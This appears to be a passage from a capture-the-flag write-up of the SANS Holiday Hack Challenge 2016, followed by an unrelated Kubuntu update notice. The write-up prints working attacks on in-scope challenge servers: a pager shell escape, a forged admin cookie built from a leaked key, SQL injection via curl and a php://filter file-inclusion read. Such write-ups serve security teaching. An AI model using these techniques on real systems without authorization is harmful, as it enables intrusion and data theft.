1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33GREETINGS PROFESSOR FALKEN. Hello. HOW ARE YOU FEELING TODAY? I'm fine. How are you? EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73? People sometimes make mistakes. YES THEY DO. SHALL WE PLAY A GAME? Love to. How about Global Thermonuclear War? WOULDN'T YOU PREFER A GOOD GAME OF CHESS? Later. Let's play Global Thermonuclear War. FINE ,------~~v,_ _ _--^\ |' \ ,__/ || _/ /,_ _ / \,/ / ,, _,,/^ v v-___ | / |'~^ \ \ | _/ _ _/^ \ / / ,~~^/ | ^~~_ _ _ / | __,, _v__\ \/ '~~, , ~ \ \ ^~ / ~ // \/ \/ \~, ,/ ~~ UNITED STATES SOVIET UNION WHICH SIDE DO YOU WANT? 1. UNITED STATES 2. SOVIET UNION PLEASE CHOOSE ONE: 2 AWAITING FIRST STRIKE COMMAND ----------------------------- PLEASE LIST PRIMARY TARGETS BY CITY AND/OR COUNTRY NAME: Las Vegas LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: LOOK AT THE PRETTY LIGHTS

That was painful, but not difficult. It was incredibly unforgiving when it comes to typos, even a single space would require retyping the sentence (though fortunately not the whole transaction).

Through the door, we find ourselves in “The Corridor” with another locked door, but this time, no terminal. I tried a few obvious passwords anyway, but had no luck with that.

Terminal: Workshop (Reindeer)

There’s a second door in the workshop, next to a few of Santa’s reindeer. (If anyone figures out whether reindeer really moo, please let me know…)

Find the passphrase from the wumpus. Play fair or cheat; it's up to you.

I was going to cheat, but first I wanted to get the lay of the game, so I wandered a bit and fired a few arrows, and happened to hit the wumpus – no cheating necessary! (I’m not sure if randomly playing is “playing fair”, but hacking is about what works!)

1 2 3 4 5 6 7 8 9Move or shoot? (m-s) s 6 *thwock!* *groan* *crash* A horrible roar fills the cave, and you realize, with a smile, that you have slain the evil Wumpus and won the game! You don't want to tarry for long, however, because not only is the Wumpus famous, but the stench of dead Wumpus is also quite well known, a stench plenty enough to slay the mightiest adventurer at a single whiff!! Passphrase: WUMPUS IS MISUNDERSTOOD Terminal: Workshop - Train Station

On the train, there’s another terminal. It proclaims to be the Train Management Console: AUTHORIZED USERS ONLY. Running a few commands, I soon discovered that BRAKEOFF works, but START requires a password which I don’t have. Looking at the HELP documentation, I noticed something odd:

1 2 3 4 5 6Help Document for the Train **STATUS** option will show you the current state of the train (brakes, boiler, boiler temp, coal level) **BRAKEON** option enables the brakes. Brakes should be enabled at every stop and while the train is not in use. **BRAKEOFF** option disables the brakes. Brakes must be disabled before the **START** command will execute. **START** option will start the train if the brake is released and the user has the correct password. **HELP** brings you to this file. If it's not here, this console cannot do it, unLESS you know something I don't.

It seemed strange that unLESS had the unusual capitalization, but then I realized the help document was probably being displayed with GNU less. Did that have a shell functionality, similar to vim or editors? The more-or-less universal command to start a shell is a bang (!), so I decided to give it a try, and was out into a shell. At first I thought about looking for the password (and you can discover it), but then I realized I could just run ActivateTrain directly.

It turns out the train is a time machine to 1978. (I wonder if that’s related to the guest password we found earlier – busyreindeer78. Guess we’ll find out soon.)

1978: Finding Santa

So I arrived in 1978 and quite frankly, had no idea what I should do. I still needed more NetWars challenge coins (man, what I wouldn’t give for a real-life NetWars challenge coin, but since I’ve never been to a NetWars event, my trophy case remains empty), so I decided to wander and find whatever I found. Guess what I found? Santa! He was in the DFER (Dungeon for Errant Reindeer), but could not remember how he got there.

Part 4: My Gosh… It’s Full of Holes

If we use ack again to find URLs containing “northpolewonderland.com” (which was just a bit of a guess from seeing one or two of these URLs when looking for credentails), we find a number of candidate URLs:

1 2 3 4 5 6 7 8% ack -o "[a-z]+\.northpolewonderland\.com" values/strings.xml 24:analytics.northpolewonderland.com 25:analytics.northpolewonderland.com 29:ads.northpolewonderland.com 32:dev.northpolewonderland.com 34:dungeon.northpolewonderland.com 35:ex.northpolewonderland.com

We can then retrieve the IP addresses for each of these hosts using our trust DNS tool dig:

1 2 3 4 5 6% dig +short {ads,analytics,dev,dungeon,ex}.northpolewonderland.com 104.198.221.240 104.198.252.157 35.184.63.245 35.184.47.139 104.154.196.33

Taking each of these IPs to our trusty Tom Hessman, we find that each of these IPs in in scope for our testing, but are advised to keep our traffic reasonable.

analytics.northpolewonderland.com

I started by doing a quick NMAP scan of the host – it’s good to know what’s running on a machine, and sometimes you can reveal some interesting info with the default set of scripts. In fact, that turned out to be extremely handy in this particular case:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27% nmap -F -sC analytics.northpolewonderland.com Starting Nmap 7.31 ( https://nmap.org ) Nmap scan report for analytics.northpolewonderland.com (104.198.252.157) Host is up (0.065s latency). rDNS record for 104.198.252.157: 157.252.198.104.bc.googleusercontent.com Not shown: 98 filtered ports PORT STATE SERVICE 22/tcp open ssh | ssh-hostkey: | 1024 5d:5c:37:9c:67:c2:40:94:b0:0c:80:63:d4:ea:80:ae (DSA) | 2048 f2:25:e1:9f:ff:fd:e3:6e:94:c6:76:fb:71:01:e3:eb (RSA) |_ 256 4c:04:e4:25:7f:a1:0b:8c:12:3c:58:32:0f:dc:51:bd (ECDSA) 443/tcp open https | http-git: | 104.198.252.157:443/.git/ | Git repository found! | Repository description: Unnamed repository; edit this file 'description' to name the... |_ Last commit message: Finishing touches (style, css, etc) | http-title: Sprusage Usage Reporter! |_Requested resource was login.php | ssl-cert: Subject: commonName=analytics.northpolewonderland.com | Subject Alternative Name: DNS:analytics.northpolewonderland.com | Not valid before: 2016-12-07T17:35:00 |_Not valid after: 2017-03-07T17:35:00 |_ssl-date: TLS randomness does not represent time | tls-nextprotoneg: |_ http/1.1

You’ll notice that the nmap http-git script was successful in this case. This is a not-uncommon finding when developers use git to deploy an application directly to the document root (very common in the case of PHP applications, which is likely the case here due to the redirect to ‘login.php’). This is great, because we can download the entire git repository, which will allow us to look for secrets, credentials, hidden handlers, or at least better understand the application.

Now, it’s not possible to directly clone this over http because nobody ran git update-server-info, as they weren’t intending to share this over the network. But that’s okay with directory indexing enabled: we can just mirror all the files with wget, then clone out a working repository:

1 2 3 4 5 6% wget --mirror https://analytics.northpolewonderland.com/.git … Downloaded: 314 files, 1003K in 0.4s (2.68 MB/s) % git clone analytics.northpolewonderland.com/.git analytics Cloning into 'analytics'... done.

Looking at the source, we find a few interesting files (given that we know an audio file is at least one of our goals): there’s a getaudio.php that returns a download of an mp3 file from the database (storing the whole MP3 in a database column isn’t the design choice I would have made, but I suppose I’ll be discovering a lot of design choices I wouldn’t have made). It’s noteworthy that the only user it will allow to download a file is the user guest. I decided to try logging in with the credentials we found in the app earlier (guest:busyreindeer78), and was straight in. Conveniently, the top of the page has a link labeled “MP3”, and a click later we have discombobulatedaudio2.mp3.

That was easy, but I have reason to believe we’re not done here – if for no reason other than the fact that there are 2 references to the analytics server in the challenge description. There’s also quite a bit of functionality we haven’t tried out yet. I spent a few minutes reviewing the SQL queries in the application. They’re not parameterized queries (again, differing design decisions) but the liberal use of mysqli_real_escape_string seems to prevent any obvious SQL injection.

One notable feature is the ability to save analytics reports. It’s *particularly *notable that the way in which they are saved is by storing the final SQL query into a column in the reports table. There’s also an ‘edit’ function for these saved queries, which seems to be design just for renaming the saved reports, but if we look at the code, we easily see that we can edit any column stored in the database, including the stored SQL query. I’m honestly not sure what the right term is for this vulnerability (SQL injection implies injecting into an existing query, after all), but it’s clearly a vulnerability that will let us read arbitrary data from the database – including the stored MP3s, assuming we can access the edit functionality.

Code allowing any column to be updated:

1 2 3 4 5 6 7 8 9 10$row = mysqli_fetch_assoc($result); # Update the row with the new values $set = []; foreach($row as $name => $value) { print "Checking for " . htmlentities($name) . "...<br>"; if(isset($_GET[$name])) { print 'Yup!<br>'; $set[] = "$name='".mysqli_real_escape_string($db, $_GET[$name])."'"; } }

This edit function is allegedly restricted to not allow any users access:

(edit.php)

1 2# Don't allow anybody to access this page (yet!) restrict_page_to_users($db, []);

However, if we investigate the restrict_page_to_users function, we find that it calls check_access from db.php, which contains this code:

(db.php)

1 2 3 4 5function check_access($db, $username, $users) { # Allow administrator to access any page if($username == 'administrator') { return; }

We now know that there’s probably an “administrator” user and that getting to that will allow us to access the edit.php page. Unfortunately, we don’t have credentials to log in as administrator, and we can’t use our arbitrary SQL to read the credentials until we have access. Stuck in a Catch-22? Not quite: who said we have to log in?

Earlier I foreshadowed the value of having access to the git repository for the site: session cookies are encrypted with symmetric crypto, and the key is available in the git repository:

define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

This allows us to encrypt our own session cookie as administrator. I hacked together a short script to create a new AUTH cookie:

1 2 3 4 5 6<?PHP include('crypto.php'); print encrypt(json_encode([ 'username' => 'administrator', 'date' => date(DateTime::ISO8601), ]));

Using my favorite cookie-editing extension to update my cookie, I quickly discover that the edit functionality is now available. Now, the edit page doesn’t provide an input field for the query, but thanks to Burp Suite, it’s easy enough to add my own parameter and edit the query. Based on getaudio.mp3, I know the schema for the audio table, so I craft a query to get it. Lacking an easy way to return the binary data directly (I can only execute this query within the context of an HTML page) I decide to return the MP3 encoded as a string. Base64 would probably be ideal to minimize overhead, but the TO_BASE64 function was added in 5.6 and I was too lazy to query the version from the database, so I encoded as hex instead.

I wanted the following query: SELECT `id`,`username`,`filename`,hex(`mp3`) FROM audio, so I POST’d to the following URL:

https://analytics.northpolewonderland.com/edit.php?id=1147b606-4d2f-4faa-b771-a55e03307367&name=foo&description=bar&query=SELECT+`id`,`username`,`filename`,hex(`mp3`)+FROM+audio

Then I ran the report with the saved report functionality, and extracted the hex and decoded it to reveal the other MP3 file. Based on the filename stored in the report, I saved it to my audio directory with the name discombobulatedaudio7.mp3. From the query results, we know these are the only 2 MP3s in the audio table, so it seems like it’s time to move on to the next server, but I decided to grab the passwords from the users table by updating the query again, just in case they might be useful later:

Addendum: An Unintentional Vulnerability

After finishing all of the challenges, I happened to be looking back at this one when I discovered a 2nd vulnerability, which I suspect was not intended as part of the challenge. If you notice the file query.php does a number of input validation checks, each looking something like this:

1 2 3 4if(!ctype_alpha($field)) { reply(400, "Field name can only contain letters!"); die(); }

You’ll notice the reply function sets the HTTP status code and prints a message, then the script dies to prevent further execution. However, if you look further down (line 178), you’ll discover this check and query construction:

1 2 3 4 5 6 7 8 9$type = $_REQUEST['type']; if($type !== 'launch' && $type !== 'usage') { reply(400, "Type has to be either 'launch' or 'usage'!"); } $query = "SELECT * "; $query .= "FROM `app_" . $type . "_reports` "; $query .= "WHERE " . join(' AND ', $where) . " "; $query .= "LIMIT 0, 100";

Though it appears the author intended to limit type to the strings ‘launch’ and ‘usage’, the lack of a call to die() in the error handler results in the query being executed and results returned anyway! So we can inject into the type field and steal the mp3 files using a UNION SELECT SQL injection:

1curl 'https://analytics.northpolewonderland.com/query.php' -H 'Cookie: AUTH=82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d87e572ba65ce9b6548b3494b6063a30265b71c76884152' -H 'Content-Type: application/x-www-form-urlencoded' --data 'date=2017-01-05&type=usage_reports` LIMIT 0 UNION SELECT id,username,filename,to_base64(mp3),NULL from audio -- ' ads.northpolewonderland.com

The nmap results for this host were rather unremarkable: essentially, yes, it’s a webserver. Visiting the full URL from the APK, the site returns directly an image file (no link? I guess these banner ads are for brick-and-mortar stores), so navigating to the root, we find the administration site for the ad system.

Fortunately, I had happened upon a helpful elf who informed me about this “Meteor” javascript framework, and the MeteorMiner script for extracting information from Meteor. Unfortunately, I had never seen Meteor before, so I had no idea what was going on. After trying some braindead attempts to steal the credentials for an administrator (Meteor.users.find().fetch() returned nothing), I attempted to register a new account to see if I could get access to more interesting functionality that way, but was repeatedly rebuffed by the site:

I began to look into how Meteor manages users, and guessed that they were using the default user management package. According to the documentation, you could add users for testing by calling the createUser method:

Accounts.createUser({password:'matirwuzhere', username:'matir'})

It turns out that this worked to create a user, and even directly logged me in as that user. Unfortunately, all of the pages still gave me a response of “You must be logged in to access this page”. I clicked around and generated dozens of requests and didn’t realize anything had meaningfully changed until I noticed that MeteorMiner was reporting a 5th member of the HomeQuote collection. Examining the collection in the javascript console revealed my prize: the path to an audio file, discombobulatedaudio5.mp3:

dev.northpolewonderland.com

Nmap gets us nothing here: just HTTP and SSH open. Visiting the webserver, we find nothing, literally. Just a “200 OK” response with no content. I can’t dirbuster (thanks Tom!), so how can I figure out what the web application might be doing?

Well, I have essentially two options: I can analyze the SantaGram APK, maybe use dex2jar and JAD (or another Java decompiler) to have semi-readable source, or maybe I can run the APK in an emulator and capture requests with Burp Suite. For several reasons, I decide to go with the 2nd route, not the least of which is that I spend a lot of time in Burp during my day-to-day, so I’ll be using the tools I’m more familiar with.

So I fire up the Android emulator with the proxy set to my Burp instance, install SantaGram with adb, and start playing with the app. It turns out this is another place that we can use the guest:busyreindeer78 credentials to log in, but no matter what I do in the app, I can’t seem to see any requests for dev.northpolewonderland.com. Looking at res/values/strings.xml from the APK, I see an important entry adjacent to the dev.northpolewonderland.com entry:

1 2 3<string name="debug_data_collection_url"> http://dev.northpolewonderland.com/index.php</string> <string name="debug_data_enabled">false</string>

Well, I suppose it’s not sending requests to dev because debug_data_enabled is false. Let’s change that to true and rebuild the APK:

1 2 3 4 5% apktool b -o santagram_mod.apk santagram % /tmp/apk-resigner/signapk.sh ./santagram_mod.apk % adb install santagram_mod.apk % adb uninstall com.northpolewonderland.santagram % adb install signed_santagram_mod.apk

It turns out rebuilding the APK was more troublesome than I anticipated because it needed to be resigned, and then the resigned one couldn’t be installed because it used a different key than the existing one, so I needed to uninstall the HHC SantaGram and install mine. (Clearly I need to do more mobile assessments.)

With the debug-enabled version installed, it was time to play with the app some more. While debugging the lack of debug requests, I noticed several references to the debug code in the user profile editing class, so I decided to give that a try and noticed (finally!) requests to dev.northpolewonderland.com.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15POST /index.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: dev.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 144 {"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400} HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Fri, 30 Dec 2016 20:09:37 GMT Content-Type: application/json Connection: close Content-Length: 250 {"date":"20161230200937","status":"OK","filename":"debug-20161230200937-0.txt","request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1c","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":false}}

I noticed that the entire request is included in the response, plus a new field is added to the JSON: "verbose":false. Can we include that in the request, and maybe switch it to true? I send the request to Burp Repeater and add the verbose field, set to true:

1 2 3 4 5 6 7 8POST /index.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: dev.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 159 {"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true}

Unsurprisingly, the response changes, but we get way more than more details about our own debug message!

1 2 3 4 5 6 7HTTP/1.1 200 OK Server: nginx/1.6.2 Date: Fri, 30 Dec 2016 23:01:56 GMT Content-Type: application/json Connection: close Content-Length: 465 {"date":"20161230230156","date.len":14,"status":"OK","status.len":"2","filename":"debug-20161230230156-0.txt","filename.len":26,"request":{"date":"20161230120936-0800","udid":"71b4a03e1f1b4e1d","debug":"com.northpolewonderland.santagram.EditProfile, EditProfile","freemem":66806400,"verbose":true},"files":["debug-20161224235959-0.mp3","debug-20161230224818-0.txt","debug-20161230225810-0.txt","debug-20161230230155-0.txt","debug-20161230230156-0.txt","index.php"]}

You’ll notice we got a listing of all the files in the current directory (they must be cleaning that up periodically!), including an mp3 file. Could this be the next discombobulatedaudioN.mp3? I download the file and get something of approximately the right size, but it’s not clear which of the discombobulated files it will be. All of the others had a filename in the discombobulated format (at least nearby, if not directly) so I set this one aside to be renamed later.

dungeon.northpolewonderland.com

Initial nmap results for dungeon.northpolewonderland.com weren’t revealing anything too interesting. Visting the webserver, I found what appears to be the help documentation for a Zork-style dungeon game. I remembered one of the elves offering up a copy of a game from a long time ago, so I went back and downloaded it.

I started playing the game briefly but, for as much as I love RPGs (I used to run several MUDs back in the 90s), I was impatient and wanted to get on with the Holiday Hack Challenge. I started with the obvious: running strings both on the binary and the data file, but that gave very little headway. I looked at Zork data file editors, but the first couple I found couldn’t decompile the provided data file (whether this is by accident, by design of the challenge, or because I picked the wrong tools, I have no idea), but that proved not to be useful. However, on one of the sites where I was reading about reversing Zork games, I discovered a mention of a built-in debugger called GDT, or the Game Debugger Tool. Among other things, GDT lets you dump all the information about NPCs, strings in the game, etc. Much like I would use GNU strings to get oriented to an unknown binary, I decided to use the GDT strings dump to find all of the in-game strings. Unfortunately, GDT required that I give it a string index and dump one at a time. Not knowing how many strings there were, I picked 2048 for a starting point and did a little inline shell script to dump them. I discovered that it starts to crash after about 1279, and the last handful seemed to be garbage (ok, no bounds checking, I wonder what else I could do?), so I decided to adjust my 2048 to 1200 and try again:

1 2 3 4 5 6 7for i in seq 1 1200; do echo -n "$i: " echo -e "GDT\nDT\n$i\nEX\nquit\ny" | \ ./dungeon 2>/dev/null | \ tail -n +5 | \ head -n -3 done

This produced a surprisingly readable strings table, except for some garbage at the end. (It appears the correct number of strings is 1027 for this particular game file.) At a quick glance, I notice some references to an “elf” near the end, while the rest of the seemed like pretty standard Zork gameplay. Most interesting seemed to be this line:

1 21024: >GDT>Entry: The elf, satisified with the trade says - Try the online version for the true prize

Well great, I need to find an online version, but I didn’t find a clue as to where it would be from the webpage with instructions, nor did the rest of the strings in the offline version offer a hint. When in doubt – more recon! Time for a full NMAP scan (but I’ll leave scripts off in the interest of time):

1 2 3 4 5 6 7 8 9 10Starting Nmap 7.31 ( https://nmap.org ) Nmap scan report for dungeon.northpolewonderland.com (35.184.47.139) Host is up (0.066s latency). rDNS record for 35.184.47.139: 139.47.184.35.bc.googleusercontent.com Not shown: 64989 closed ports, 543 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 11111/tcp open vce Nmap done: 1 IP address (1 host up) scanned in 46.16 seconds

Aha! Port 11111 is open. I imagine netcat will give us an instance of the dungeon game. My first question is whether the “Try the online version for the true prize” string says something different:

1 2 3 4 5 6 7 8 9 10% nc dungeon.northpolewonderland.com 11111 Welcome to Dungeon. This version created 11-MAR-78. You are in an open field west of a big white house with a boarded front door. There is a small wrapped mailbox here. >GDT GDT>DT Entry: 1024 The elf, satisified with the trade says - send email to "peppermint@northpolewonderland.com" for that which you seek.

That was surprisingly easy – I really expected to need to do more. Maybe it’s misleading? I send an email off to Peppermint and wait with anticipation for Santa’s elves to do their work.

It turns out it really was that easy! Moments later, I have an email from Pepperment with an attachment: it’s discombobulatedaudio3.mp3!

ex.northpolewonderland.com

One last server to go! This server is apparently for handling uncaught exceptions from the application. To figure out what kind of traffic it’s seeing, I decided to try to trigger an exception in the application running in the emulator (still going from my work on dev.northpolewonderland.com). I actually stumbled upon this by mistake: if you change the device to be emulated to a Nexus 6, the application crashes and sends a crash report to ex.northpolewonderland.com.

1 2 3 4 5 6 7 8POST /exception.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: ex.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 3860 {"operation":"WriteCrashDump","data":{...}}

I’ve omitted the contents of “data” in the interest of space, but it mostly contained the traceback of the exception that was thrown. Interestingly, the response indicates that crashdumps are stored with a PHP extension, so my first thought was to try to include PHP code in the backtrace, but that never worked out (the code wasn’t being executed). I’m assuming the PHP interpreter wasn’t turned on for that directory.

1 2 3 4 5 6 7 8 9 10HTTP/1.1 200 OK Server: nginx/1.10.2 Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 81 { "success" : true, "folder" : "docs", "crashdump" : "crashdump-QKMuKk.php" }

It turns out there’s also a ReadCrashDump operation that you can provide a crashdump name and it will return the contents. You omit the php extension when sending the request, like so:

1 2 3 4 5 6 7 8POST /exception.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: ex.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 69 {"operation":"ReadCrashDump","data":{"crashdump":"crashdump-QKMuKk"}}

Given that I confirmed the crashdumps are in a folder “docs” relative to exception.php, I tried reading the “crashdump” ../exception to see if I could view the source, but that gives a 500 Internal Server Error. (Likely it keeps loading itself in an include() loop.) PHP, however, provides some creative ways to read data, filtering it inline. These pseudo-URLs for file opening result in different encodings and can be quite useful for bypassing LFI filters, non-printable characters for extracting binaries, etc. I chose to use one that encodes a file as base64 to see if I could get the source of exception.php:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17POST /exception.php HTTP/1.1 Content-Type: application/json User-Agent: Dalvik/2.1.0 (Linux; U; Android 7.1; Android SDK built for x86 Build/NPF26K) Host: ex.northpolewonderland.com Connection: close Accept-Encoding: gzip Content-Length: 109 {"operation":"ReadCrashDump","data":{"crashdump":"php://filter/convert.base64-encode/resource=../exception"}} HTTP/1.1 200 OK Server: nginx/1.10.2 Date: Sat, 31 Dec 2016 00:56:57 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 3168 PD9waHAgCgojIEF1ZGlvIGZpbGUgZnJvbSBEaXNjb21ib2J1bGF0b3IgaW4gd2Vicm9vdDog … oZHVtcFsnY3Jhc2hkdW1wJ10gLiAnLnBocCcpOwoJfQkKfQoKPz4K

The base64 encoded output is a great sign. I decode it to discover, as expected, the contents of exception.php, which starts with this helpful hint:

1 2<?php # Audio file from Discombobulator in webroot: discombobulated-audio-6-XyzE3N9YqKNH.mp3

So, there we have our final piece of the discombobulated audio: discombobulatedaudio6.mp3. This particular LFI was interesting for a few reasons: the use of chdir() to change directory instead of prepending the directory name, and the requirement that the file ends in .php. Had they prepended the directory name, a filter could not have been used because the filter must be at the beginning of the string passed to the PHP file open functions (like require, include, fopen).

Part 5: Discombobulated Audio Fixing the Audio

We now have 7 audio files. Listening to each one, you don’t hear much, but the overall tone suggests to me that the final file has been slowed somewhat. So I open up Audacity and put all the files into one project. Then I used the option “Tracks > Align Tracks > Align End to End” to place the tracks into a series, with the resulting audio concatenated like this:

I wasn’t sure if numerical order would be the right order, but the amplitude of the end of each piece looked similar to the amplitude of the beginning of the next piece and playing the audio sounded rather continuous, but still unintelligible, so I decided to proceed. (I was hoping nobody was going to make me try all 5040 permutations of audio!) I merged the tracks together (via Tracks > Mix and Render) and then changed the tempo (via Effects > Change Tempo) by about 600%. It still didn’t sound quite right, but was close enough that I could make out the message:

“Merry Christmas, Santa Claus, or as I have always known him, Jeff”

It wasn’t clear to me what to do with the audio, or how this would help to find the kidnapper, but since there’s still one door that I didn’t have the password to (the corridor behind Santa’s office), I decided to try and see if this helped with getting past the door.

Santa’s Kidnapper

I was honestly a little surprised when the “Nice” light flashed and I was past the last locked door! As soon as I was through, I was in a small dark room with a ladder going up. I actually hesitated to click up the ladder, because part of me didn’t want the game to be over. But without anything else to do in the game (except collect NetWars coins… that took a little extra time) I clicked up the ladder, expecting a nefarious villain, and finding…. Dr. Who?

But why, Dr. Who, why? I can’t, for the life of me, imagine a reason to kidnap Santa Claus and take him back to 1978.

As told in his own words:

<Dr. Who> - I have looked into the time vortex and I have seen a universe in which the Star Wars Holiday Special was NEVER released. In that universe, 1978 came and went as normal. No one had to endure the misery of watching that abominable blight. People were happy there. It's a better life, I tell you, a better world than the scarred one we endure here.

Well, actually, I think I have to agree with the Doctor. The world would be a much better place without the Star Wars Holiday Special, but the ends do not justify the means, however Santa was returned in time to complete his Christmas rounds and deliver the toys via portal to all the white hat boys and girls of the world. (And perhaps a few of the grey hats too…)

Kubuntu General News: Plasma 5.8.5 bugfix release in Xenial and Yakkety Backports now

Thu, 01/05/2017 - 00:57

Plasma 5.8.5 brings bug-fixes and translations from the month of December, thanks to the hard work of the Plasma team and the KDE Translation team.

To update, use the Software Repository Guide to add the following repository to your software sources list:

ppa:kubuntu-ppa/backports

Instructions on how to manage PPAs and more info about the Kubuntu PPAs can be found in the Repositories Documentation

Pages